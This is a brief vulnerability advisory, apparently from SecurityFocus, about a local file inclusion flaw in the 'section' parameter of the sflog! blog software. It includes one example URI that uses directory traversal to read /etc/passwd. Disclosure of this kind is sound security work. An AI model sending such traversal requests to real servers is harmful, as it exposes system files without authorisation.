sflog! 'section' Parameter Local File Include Vulnerability

An attacker can exploit the issue with a browser

The following example URI is available:

http://www.example.com/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd


 

Privacy Statement
Copyright 2010, SecurityFocus